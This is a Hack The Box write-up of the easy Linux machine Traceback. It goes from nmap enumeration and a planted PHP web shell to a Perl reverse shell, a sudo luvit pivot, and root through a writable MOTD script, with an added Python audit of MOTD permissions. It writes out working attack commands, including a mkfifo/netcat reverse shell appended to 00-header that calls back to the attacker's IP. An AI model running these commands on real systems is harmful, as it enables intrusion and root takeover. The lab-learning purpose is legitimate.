
Traceback Writeup [HTB]

Traceback is a Linux machine rated easy on Hack The Box. It consists of enumerating a hidden PHP web shell to obtain a reverse shell, and then obtaining root by getting code executed through the message of the day.

Enumeration

Running nmap:

  nmap -sC -sV 10.10.10.181
  Nmap scan report for 10.10.10.181
  Host is up (0.14s latency).
  Not shown: 998 closed ports
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
  |   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
  |_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
  80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: Help us
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find a defaced page. Inspecting its source code we get a hint about web shells:

<body>
	<center>
		<h1>This site has been owned</h1>
		<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
		<h3> - Xh4H - </h3>
		<!--Some of the best web shells that you might need ;)-->
	</center>
</body>
</html>

Searching that comment in Google leads to a GitHub repository containing a few web shells: https://github.com/TheBinitGhimire/Web-Shells. We run the following bash one-liner to see which of those web shells is present on the server:

for file in `ls Web-Shells`; do echo $file && curl -I http://10.10.10.181/$file; done
smevk.php
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 09:22:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=akdt156m66vpen857lj14mnha9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8

Exploitation

Accessing the web shell asks for credentials, but its source code contains hardcoded credentials, admin:admin, which grant access.

Through the web shell's Network section we can launch a Perl reverse shell, and we obtain a reverse connection as webadmin:

nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.181] 40304
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ whoami
webadmin

Upgrade the shell to an interactive one:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Inside webadmin's home directory there is a .txt file:

- sysadmin -
I have left a tool to practice Lua.
I am sure you know where to find it.
Contact me if you have any question.

Running sudo -l gives the following output:

User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit

Therefore, using luvit we can execute Lua code as sysadmin and pivot to that user:

webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
<n /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
sysadmin@traceback:/home/webadmin$ whoami
whoami

Privilege escalation

As user sysadmin we can go into the .ssh directory and copy our id_rsa.pub into authorized_keys, after which we can log in over SSH:

ssh sysadmin@10.10.10.181 -i id_rsa
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Aug 13 02:58:53 2020 from 10.10.14.43

We are greeted with a banner, the message of the day, which is generated by the scripts in /etc/update-motd.d. Listing that directory shows we have write permission on those scripts. Therefore, we can append commands to 00-header that will be executed as root whenever a user logs in.

sysadmin@traceback:/etc/update-motd.d$ ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Aug 13 03:22 00-header
-rwxrwxr-x  1 root sysadmin  982 Aug 13 03:22 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Aug 13 03:22 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Aug 13 03:22 80-esm
-rwxrwxr-x  1 root sysadmin  299 Aug 13 03:22 91-release-upgrade
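The root step works only because the MOTD scripts are group-writable by a non-root group. As an added example that is not part of the original writeup, the following Python audit parses an `ls -la` listing of /etc/update-motd.d (constructed from the output above) and flags every script that a non-root user could modify; the function and class names are my own.

```python
import re
from dataclasses import dataclass

# ls -la output for /etc/update-motd.d, constructed from the listing in the writeup
LISTING = """\
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Aug 13 03:22 00-header
-rwxrwxr-x  1 root sysadmin  982 Aug 13 03:22 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Aug 13 03:22 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Aug 13 03:22 80-esm
-rwxrwxr-x  1 root sysadmin  299 Aug 13 03:22 91-release-upgrade
"""

# type char, nine permission chars, link count, owner, group, size, month, day, time-or-year, name
LS_LINE = re.compile(
    r"^(?P<type>[-dl])(?P<perms>[rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


@dataclass
class Entry:
    name: str
    is_dir: bool
    owner: str
    group: str
    perms: str  # the nine rwx characters, owner/group/other


def parse_ls_listing(text: str) -> list[Entry]:
    """Turn `ls -la` text into Entry objects, skipping the 'total' line."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if m:
            entries.append(Entry(m["name"], m["type"] == "d", m["owner"], m["group"], m["perms"]))
    return entries


def writable_by_non_root(e: Entry) -> bool:
    """True if someone other than root could change the file's contents."""
    if e.owner != "root":
        return True  # a non-root owner can always chmod and write
    group_w = e.perms[4] == "w"
    other_w = e.perms[7] == "w"
    return other_w or (group_w and e.group != "root")


def audit_motd_dir(text: str) -> list[str]:
    """Return names of MOTD scripts (excluding . and ..) that a non-root user could edit."""
    return [e.name for e in parse_ls_listing(text)
            if e.name not in (".", "..") and not e.is_dir and writable_by_non_root(e)]
```

Every script under /etc/update-motd.d runs as root at login, so any name this audit returns is a direct root escalation path; the fix is root ownership with mode 755 on each script.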

We append a netcat reverse shell to 00-header:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.48 8888 >/tmp/f" >> 00-header

On the next login, our netcat listener receives a reverse connection as root:

nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.181] 33462
/bin/sh: 0: cant access tty; job control turned off
# whoami
root
This post is licensed under CC BY 4.0 by the author.